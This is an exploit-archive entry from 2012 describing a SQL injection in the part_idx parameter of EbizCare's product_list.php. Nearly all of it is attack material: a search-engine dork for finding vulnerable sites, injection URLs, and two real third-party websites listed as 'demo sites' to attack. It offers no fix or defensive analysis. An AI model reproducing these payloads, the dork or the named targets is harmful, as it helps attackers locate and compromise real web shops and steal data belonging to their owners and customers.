EbizCare => SQL Injection Vulnerability



EKU-ID: 1589 CVE: OSVDB-ID:
Author: dbx Published: 2012-03-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


===========================================================

[+] Exploit Title: EbizCare => SQL Injection Vulnerability
[+] Date: March 05, 2012
[+] Author: dbx
[+] Vendor or Software Link: http://www.ebizcare.com/
[+] Category: WebApps
[+] Google dork: inurl: "product_list.php?part_idx="
[+] Tested on: Windows Vista 64-Bit

============================================================

[~] Exploit:

http://www.host.com/default/product_list.php?part_idx=35'

http://www.host.com/default/product_list.php?part_idx=[SQLi]

[~] Demo site:

http://www.animepia.com/default/product_list.php?part_idx=206'

http://vladofootwear.com/default/product_list.php?part_idx=407'

###############################################################